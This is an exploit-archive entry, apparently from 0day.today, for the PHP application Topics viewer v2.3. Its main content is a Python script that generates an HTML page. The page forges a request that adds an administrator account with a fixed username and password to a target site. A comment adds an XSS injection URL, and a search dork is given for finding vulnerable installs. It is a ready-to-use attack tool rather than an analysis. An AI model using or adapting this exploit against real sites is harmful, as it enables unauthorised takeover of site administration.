Topics viewer v 2.3 csrf (Add Admin) / XSS Vulnerabilites

2012-05-14T00:00:00
ID 1337DAY-ID-18266
Type zdt
Reporter Cyber-Crystal
Modified 2012-05-14T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            #!/usr/bin/env python
########################################################################
# Title    : Topics viewer v 2.3 csrf Add Admin and XSS
# Author   : Cyber-Crystal
# Version  : 2.3
# Homepage : http://nilehoster.com/default/topicsviewer
# Dork     : "Programmed by : Nilehoster.com"
# Tested on: Win/7
# Based on POC : http://vb.ehcommunity.com/showthread.php?t=70682
# CVE : 14 May 2012
#---------------------------------------------------------------------
# ^_^ > snc0pe | secure-x41 | Dmar al3noOoz | al-swisre || All
# 
#
# Xss Exploit is Here :
# http://localhost//admincp/edit_block.php?id=XSS

import sys
import string
import os


def banner():
	print '''
----------------------------------
Topics viewer v 2.3 csrf Add Admin
----------------------------------

[+] python Exploit.py http://www.exp.com  	
'''
if os.name == "nt":
	os.system("cls")
	os.system("color e")
else :
	os.system('clear')
	
if len(sys.argv) < 2:
	banner()
	sys.exit()
	
vic = sys.argv[1].replace("http://","").replace("/","")
file = open("Exploit.html", "w")


db = ("<html>\n"
"<body>\n"
"<form action='http://"+vic+"/admincp/main.php?op=add-admin' method='post' name='sdf'>\n"
"<input type='text' name='u_name' value='p0c' />\n"
"<input type='text' name='u_m_pass' value='1212' />\n"
"<input type='text' name='u_email' value='[email protected]' />\n"
"<input type='text' name='verification' value='101010'/> <!-- Any number-->\n"
"<script>document.xss.submit();</script><br />\n"
"<input type='submit' value='Exploit'/>\n"
"</form>\n"
"</body>\n"
"</html>\n")
	
file.write(db)
print "Createing ...\n"
print "user Name And Password ...\n"
print "User : p0c \t Pass : 1212"

# The End



#  0day.today [2018-04-05]  #